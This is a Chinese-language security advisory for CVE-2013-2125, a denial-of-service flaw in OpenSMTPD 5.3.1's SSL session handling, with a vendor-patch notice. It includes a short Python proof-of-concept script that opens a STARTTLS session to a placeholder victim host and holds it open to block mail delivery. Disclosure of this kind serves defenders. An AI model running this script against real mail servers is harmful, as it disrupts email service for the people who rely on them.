OpenSMTPD SSL会话处理拒绝服务漏洞

发布日期：2013-05-21
更新日期：2013-05-23

受影响系统：
opensmtpd opensmtpd 5.x
描述：
--------------------------------------------------------------------------------
CVE(CAN) ID: CVE-2013-2125
 
OpenSMTPD是RFC 5321定义的服务器端SMTP协议的自由实现。
 
OpenSMTPD 5.3.1在处理SSL会话时错误地配置了blocking模式中的套接字，攻击者通过保持套接字的开放状态，即可导致停止服务接收电子邮件。
 
<*来源：Jason Donenfeld （Jason@zx2c4.com）
 
  链接：
       
 *>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
Jason Donenfeld （Jason@zx2c4.com）提供了如下测试方法：
 
    #!/usr/bin/env python2
    import smtplib
    import time
    print "[+] Connecting to server and initiating TLS"
    smtp = smtplib.SMTP("mail.some-vitim-host.blah", 587)
    smtp.starttls()
    print "[+] No clients will be able to connect as long as this remains open."
    time.sleep(100000000)

建议：
--------------------------------------------------------------------------------
厂商补丁：
 
opensmtpd
 ---------
 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：